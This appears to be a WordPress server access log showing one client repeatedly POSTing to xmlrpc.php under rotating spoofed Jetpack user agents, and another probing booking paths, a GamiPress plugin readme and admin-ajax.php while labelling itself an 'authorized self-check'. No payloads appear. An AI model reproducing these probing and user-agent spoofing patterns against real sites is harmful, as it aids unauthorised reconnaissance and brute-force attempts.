2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:41:54 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.2)"
45.3.49.13 - - [08/Sep/2026:17:41:56 +0200] "GET /book-appointment/ HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:42:05 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.3)"
45.3.49.13 - - [08/Sep/2026:17:42:08 +0200] "GET /booking/ HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:42:15 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:42:26 +0200] "GET /appointment/ HTTP/1.1" 503 468 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:42:26 +0200] "POST /xmlrpc.php HTTP/1.1" 503 41364 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.3)"
45.3.49.13 - - [08/Sep/2026:17:42:46 +0200] "GET /wp-content/plugins/gamipress/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
45.3.49.13 - - [08/Sep/2026:17:42:59 +0200] "GET /wp-content/plugins/gamipress/readme.txt HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:43:11 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.1)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:43:21 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:43:32 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.2)"
45.3.49.13 - - [08/Sep/2026:17:43:40 +0200] "GET / HTTP/1.1" 200 41336 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:43:43 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
45.3.49.13 - - [08/Sep/2026:17:43:53 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 157201 "-" "CMS-Security-Auditor/1.0 (+authorized self-check; contact: local-admin)"
2409:4090:b059:f606:dfb:1dba:c3ec:9894 - - [08/Sep/2026:17:43:53 +0200] "POST /xmlrpc.php HTTP/1.1" 200 41365 "-" "WordPress.com; https://wordpress.com"
